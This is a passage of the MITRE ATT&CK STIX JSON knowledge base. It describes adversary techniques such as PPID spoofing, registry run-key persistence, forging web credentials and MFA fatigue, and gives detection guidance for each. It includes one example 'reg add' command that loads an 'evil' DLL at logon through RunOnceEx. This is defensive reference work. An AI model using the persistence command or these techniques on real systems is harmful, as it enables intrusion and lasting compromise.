"https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d"}, {"source_name": "Mitiga Security Advisory: SSM Agent as Remote Access Trojan", "description": "Ariel Szarf, Or Aspir. (n.d.). Mitiga Security Advisory: Abusing the SSM Agent as a Remote Access Trojan. Retrieved January 31, 2024.", "url": "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-09T14:00:00.188Z", "name": "Exfiltration Over C2 Channel", "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "exfiltration"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["William Cain"], "x_mitre_deprecated": false, "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "2.2", "x_mitre_data_sources": [], "x_mitre_network_requirements": false, "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", "created": "2017-05-31T21:30:41.804Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1041", "external_id": "T1041"}, {"source_name": "University of Birmingham C2", "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-05-24T14:00:00.188Z", "name": "Parent PID Spoofing", "description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the CreateProcess API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via svchost.exe or consent.exe) rather than the current user context.(Citation: Microsoft UAC Nov 2018)\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be explorer.exe rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)\n\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as lsass.exe), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Wayne Silva, F-Secure Countercept"], "x_mitre_deprecated": false, "x_mitre_detection": "Look for inconsistencies between the various fields that store PPID information, such as the EventHeader ProcessId from data collected via Event Tracing for Windows (ETW), Creator Process ID/Name from Windows event logs, and the ProcessID and ParentProcessID (which are also produced from ETW and other utilities such as Task Manager and Process Explorer). The ETW provided EventHeader ProcessId identifies the actual parent process.(Citation: CounterCept PPID Spoofing Dec 2018)\n\nMonitor and analyze API calls to CreateProcess/CreateProcessA, specifically those from user/potentially malicious processes and with parameters explicitly assigning PPIDs (ex: the Process Creation Flags of 0x8XXX, indicating that the process is being created with extended startup information(Citation: Microsoft Process Creation Flags May 2018)). Malicious use of CreateProcess/CreateProcessA may also be proceeded by a call to UpdateProcThreadAttribute, which may be necessary to update process creation attributes.(Citation: Secuirtyinbits Ataware3 May 2019) This may generate false positives from normal UAC elevation behavior, so compare to a system baseline/understanding of normal system activity if possible.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Heuristic Detection", "Host Forensic Analysis"], "x_mitre_permissions_required": ["User", "Administrator"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--93591901-3172-4e94-abf8-6034ab26f44a", "created": "2020-02-18T18:22:41.448Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1134/004", "external_id": "T1134.004"}, {"source_name": "XPNSec PPID Nov 2017", "description": "Chester, A. (2017, November 20). Alternative methods of becoming SYSTEM. Retrieved June 4, 2019.", "url": "https://blog.xpnsec.com/becoming-system/"}, {"source_name": "CounterCept PPID Spoofing Dec 2018", "description": "Loh, I. (2018, December 21). Detecting Parent PID Spoofing. Retrieved June 3, 2019.", "url": "https://www.countercept.com/blog/detecting-parent-pid-spoofing/"}, {"source_name": "Microsoft UAC Nov 2018", "description": "Montemayor, D. et al.. (2018, November 15). How User Account Control works. Retrieved June 3, 2019.", "url": "https://docs.microsoft.com/windows/security/identity-protection/user-account-control/how-user-account-control-works"}, {"source_name": "Microsoft Process Creation Flags May 2018", "description": "Schofield, M. & Satran, M. (2018, May 30). Process Creation Flags. Retrieved June 4, 2019.", "url": "https://docs.microsoft.com/windows/desktop/ProcThread/process-creation-flags"}, {"source_name": "Secuirtyinbits Ataware3 May 2019", "description": "Secuirtyinbits . (2019, May 14). Parent PID Spoofing (Stage 2) Ataware Ransomware Part 3. Retrieved June 6, 2019.", "url": "https://www.securityinbits.com/malware-analysis/parent-pid-spoofing-stage-2-ataware-ransomware-part-3"}, {"source_name": "DidierStevens SelectMyParent Nov 2009", "description": "Stevens, D. (2009, November 22). Quickpost: SelectMyParent or Playing With the Windows Process Tree. Retrieved June 3, 2019.", "url": "https://blog.didierstevens.com/2009/11/22/quickpost-selectmyparent-or-playing-with-the-windows-process-tree/"}, {"source_name": "CTD PPID Spoofing Macro Mar 2019", "description": "Tafani-Dereeper, C. (2019, March 12). Building an Office macro to spoof parent processes and command line arguments. Retrieved June 3, 2019.", "url": "https://blog.christophetd.fr/building-an-office-macro-to-spoof-process-parent-and-command-line/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Gather Victim Org Information", "description": "Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about an organization may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak)(Citation: SEC EDGAR Search) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "reconnaissance"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["PRE"], "x_mitre_version": "1.1", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--937e4772-8441-4e4a-8bf0-8d447d667e23", "created": "2020-10-02T16:27:02.339Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1591", "external_id": "T1591"}, {"source_name": "ThreatPost Broadvoice Leak", "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020.", "url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/"}, {"source_name": "SEC EDGAR Search", "description": "U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August 27, 2021.", "url": "https://www.sec.gov/edgar/search-and-access"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Registry Run Keys / Startup Folder", "description": "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be executed under the context of the user and will have the account's associated permissions level.\n\nPlacing a program within a startup folder will cause that program to execute when a user logs in. There is a startup folder location for individual user accounts as well as a system-wide startup folder that will be checked regardless of which user account logs in.\n\nThe startup folder path for the current user is:\n* C:\\Users\\[Username]\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\nThe startup folder path for all users is:\n* C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\n\nThe following run keys are created by default on Windows systems:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\n\nThe HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx is also available but is not created by default on Windows Vista and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a \"Depend\" key with RunOnceEx: reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\\0001\\Depend /v 1 /d \"C:\\temp\\evil[.]dll\" (Citation: Oddvar Moe RunOnceEx Mar 2018)\n\nThe following Registry keys can be used to set startup folder items for persistence:\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\n* HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\n\nThe following Registry keys can control automatic startup of services during boot:\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\n\nUsing policy settings to specify startup programs creates corresponding values in either of two Registry keys:\n* HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n* HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\n\nThe Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of these actions are under the control of the operating system, but you can also add custom actions here. The HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit and HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell subkeys can automatically launch programs.\n\nPrograms listed in the load value of the registry key HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows run when any user logs on.\n\nBy default, the multistring BootExecute value of the registry key HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager is set to autocheck autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the system has been shut down abnormally. Adversaries can add other programs or processes to this registry value which will automatically launch at boot.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if they are associated with legitimate programs.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Oddvar Moe, @oddvarmoe"], "x_mitre_detection": "Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. (Citation: TechNet Autoruns) Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data.\n\nChanges to these locations typically happen under normal conditions when legitimate software is installed. To increase confidence of malicious activity, data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["User", "Administrator"], "x_mitre_system_requirements": ["HKEY_LOCAL_MACHINE keys require administrator access to create and modify"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9422fc14-1c43-410d-ab0f-a709b76c72dc", "created": "2017-05-31T21:30:49.988Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1060", "external_id": "T1060"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/270.html", "external_id": "CAPEC-270"}, {"source_name": "Microsoft Run Key", "description": "Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014.", "url": "http://msdn.microsoft.com/en-us/library/aa376977"}, {"source_name": "Microsoft RunOnceEx APR 2018", "description": "Microsoft. (2018, August 20). Description of the RunOnceEx Registry Key. Retrieved June 29, 2018.", "url": "https://support.microsoft.com/help/310593/description-of-the-runonceex-registry-key"}, {"source_name": "Oddvar Moe RunOnceEx Mar 2018", "description": "Moe, O. (2018, March 21). Persistence using RunOnceEx - Hidden from Autoruns.exe. Retrieved June 29, 2018.", "url": "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2023-10-15T11:10:03.428Z", "name": "Forge Web Credentials", "description": "Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access.\n\nAdversaries may generate these credential materials in order to gain access to web resources. This differs from [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539), [Steal Application Access Token](https://attack.mitre.org/techniques/T1528), and other similar behaviors in that the credentials are new and forged by the adversary, rather than stolen or intercepted from legitimate users.\n\nThe generation of web credentials often requires secret values, such as passwords, [Private Keys](https://attack.mitre.org/techniques/T1552/004), or other cryptographic seed values.(Citation: GitHub AWS-ADFS-Credential-Generator) Adversaries may also forge tokens by taking advantage of features such as the `AssumeRole` and `GetFederationToken` APIs in AWS, which allow users to request temporary security credentials (i.e., [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005)), or the `zmprov gdpak` command in Zimbra, which generates a pre-authentication key that can be used to generate tokens for any user in the domain.(Citation: AWS Temporary Security Credentials)(Citation: Zimbra Preauth)\n\nOnce forged, adversaries may use these web credentials to access resources (ex: [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550)), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Pass The Cookie)(Citation: Unit 42 Mac Crypto Cookies January 2019)(Citation: Microsoft SolarWinds Customer Guidance) ", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Dylan Silva, AWS Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor for anomalous authentication activity, such as logons or other user session activity associated with unknown accounts. Monitor for unexpected and abnormal access to resources, including access of websites and cloud-based applications by the same user in different locations or by different systems that do not match expected configurations.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["SaaS", "Windows", "macOS", "Linux", "Azure AD", "Office 365", "Google Workspace", "IaaS"], "x_mitre_version": "1.4", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--94cb00a4-b295-4d06-aa2b-5653b9c1be9c", "created": "2020-12-17T02:13:46.247Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1606", "external_id": "T1606"}, {"source_name": "AWS Temporary Security Credentials", "description": "AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022.", "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html"}, {"source_name": "Unit 42 Mac Crypto Cookies January 2019", "description": "Chen, Y., Hu, W., Xu, Z., et. al. (2019, January 31). Mac Malware Steals Cryptocurrency Exchanges\u2019 Cookies. Retrieved October 14, 2019.", "url": "https://unit42.paloaltonetworks.com/mac-malware-steals-cryptocurrency-exchanges-cookies/"}, {"source_name": "GitHub AWS-ADFS-Credential-Generator", "description": "Damian Hickey. (2017, January 28). AWS-ADFS-Credential-Generator. Retrieved December 16, 2020.", "url": "https://github.com/damianh/aws-adfs-credential-generator"}, {"source_name": "Microsoft SolarWinds Customer Guidance", "description": "MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020.", "url": "https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/"}, {"source_name": "Pass The Cookie", "description": "Rehberger, J. (2018, December). Pivot to the Cloud using Pass the Cookie. Retrieved April 5, 2019.", "url": "https://wunderwuzzi23.github.io/blog/passthecookie.html"}, {"source_name": "Zimbra Preauth", "description": "Zimbra. (2023, March 16). Preauth. Retrieved May 31, 2023.", "url": "https://wiki.zimbra.com/wiki/Preauth"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-05-08T20:13:24.241Z", "name": "Detect Program State", "description": "Adversaries may seek to gather information about the current state of a program on a PLC. State information reveals information about the program, including whether it's running, halted, stopped, or has generated an exception. This information may be leveraged as a verification of malicious program execution or to determine if a PLC is ready to download a new program.", "kill_chain_phases": [{"kill_chain_name": "mitre-ics-attack", "phase_name": "collection"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_domains": ["ics-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Field Controller/RTU/PLC/IED"], "x_mitre_version": "1.0", "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--94f042ae-3033-4a8d-9ec3-26396533a541", "created": "2020-05-21T17:43:26.506Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-ics-attack", "url": "https://attack.mitre.org/techniques/T0870", "external_id": "T0870"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": []}, {"modified": "2024-04-19T04:26:29.365Z", "name": "Multi-Factor Authentication Request Generation", "description": "Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.\n\nAdversaries in possession of credentials to [Valid Accounts](https://attack.mitre.org/techniques/T1078) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account. If adversaries lack credentials to victim accounts, they may also abuse automatic push notification generation when this option is configured for self-service password reset (SSPR).(Citation: Obsidian SSPR Abuse 2023)\n\nIn some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to \u201cMFA fatigue.\u201d(Citation: Russian 2FA Push Annoyance - Cimpanu)(Citation: MFA Fatigue Attacks - PortSwigger)(Citation: Suspected Russian Activity Targeting Government and Business Entities Around the Globe)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Jon Sternstein, Stern Security", "Pawel Partyka, Microsoft 365 Defender", "Shanief Webb", "Obsidian Security"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor user account logs as well as 2FA/MFA application logs for suspicious events: unusual login attempt source location, mismatch in location of login attempt and smart device receiving 2FA/MFA request prompts, and high volume of repeated login attempts, all of which may indicate user's primary credentials have been compromised minus 2FA/MFA mechanism. ", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Office 365", "Linux", "macOS", "IaaS", "SaaS", "Azure AD", "Google Workspace"], "x_mitre_version": "1.1", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--954a1639-f2d6-407d-aef3-4917622ca493", "created": "2022-04-01T02:15:49.754Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1621", "external_id": "T1621"}, {"source_name": "Russian 2FA Push Annoyance - Cimpanu", "description": "Catalin Cimpanu. (2021, December 9). Russian hackers bypass 2FA by annoying victims with repeated push notifications. Retrieved March 31, 2022.", "url": "https://therecord.media/russian-hackers-bypass-2fa-by-annoying-victims-with-repeated-push-notifications/"}, {"source_name": "MFA Fatigue Attacks - PortSwigger", "description": "Jessica Haworth. (2022, February 16). MFA fatigue attacks: Users tricked into allowing device access due to overload of push notifications. Retrieved March 31, 2022.", "url": "https://portswigger.net/daily-swig/mfa-fatigue-attacks-users-tricked-into-allowing-device-access-due-to-overload-of-push-notifications"}, {"source_name": "Suspected Russian Activity Targeting Government and Business Entities Around the Globe", "description": "Luke Jenkins, Sarah Hawley, Parnian Najafi, Doug Bienstock. (2021, December 6). Suspected Russian Activity Targeting Government and Business Entities Around the Globe. Retrieved April 15, 2022.", "url": "https://www.mandiant.com/resources/russian-targeting-gov-business"}, {"source_name": "Obsidian SSPR Abuse 2023", "description": "Noah Corradin and Shuyang Wang. (2023, August 1). Behind The Breach: Self-Service Password Reset (SSPR) Abuse in Azure AD. Retrieved March 28, 2024.", "url": "https://www.obsidiansecurity.com/blog/behind-the-breach-self-service-password-reset-azure-ad/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-04-16T13:03:40.824Z", "name": "Compromise Host Software Binary", "description": "Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications.\n\nAdversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host.\n\nAn adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary\u2019s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["CrowdStrike Falcon OverWatch"], "x_mitre_deprecated": false, "x_mitre_detection": "Collect and analyze signing certificate metadata and check signature validity on software that executes within the environment. Look for changes to client software that do not correlate with known software or patch cycles. \n\nConsider monitoring for anomalous behavior from client applications, such as atypical module loads, file reads/writes, or network connections.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "2.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--960c3c86-1480-4d72-b4e0-8c242e84a5c5", "created": "2020-02-11T18:18:34.279Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1554", "external_id": "T1554"}, {"source_name": "Unit42 Banking Trojans Hooking 2022", "description": "Or Chechik. (2022, October 31). Banking Trojan Techniques: How Financially Motivated Malware Became Infrastructure. Retrieved September 27, 2023.", "url": "https://unit42.paloaltonetworks.com/banking-trojan-techniques/#post-125550-_rm3d6xxbk52n"}, {"source_name": "ESET FontOnLake Analysis 2021", "description": "Vladislav Hr\u010dka. (2021, January 1). FontOnLake. Retrieved September 27, 2023.", "url": "https://web-assets.esetstatic.com/wls/2021/10/eset_fontonlake.pdf"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-04-11T00:34:00.779Z", "name": "Chat Messages", "description": "Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.\n\nRather than accessing the stored chat logs (i.e., [Credentials In Files](https://attack.mitre.org/techniques/T1552/001)), adversaries may directly access credentials within these services on the user endpoint, through servers hosting the services, or through administrator portals for cloud hosted services. Adversaries may also compromise integration tools like Slack Workflows to automatically search through messages to extract user credentials. These credentials may then be abused to perform follow-on activities such as lateral movement or privilege escalation (Citation: Slack Security Risks).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "3.1.0", "x_mitre_contributors": ["Douglas Weir"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Office 365", "SaaS", "Google Workspace"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--9664ad0e-789e-40ac-82e2-d7b17fbe8fb3", "created": "2023-03-14T14:38:03.673Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1552/008", "external_id": "T1552.008"}, {"source_name": "Slack Security Risks", "description": "Michael Osakwe. (2020, November 18). 4 SaaS and Slack Security Risks to Consider. Retrieved March 17, 2023.", "url": "https://www.nightfall.ai/blog/saas-slack-security-risks-2020"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-03-01T18:01:37.575Z", "name": "PowerShell", "description": "Adversaries may abuse PowerShell commands and scripts for execution. 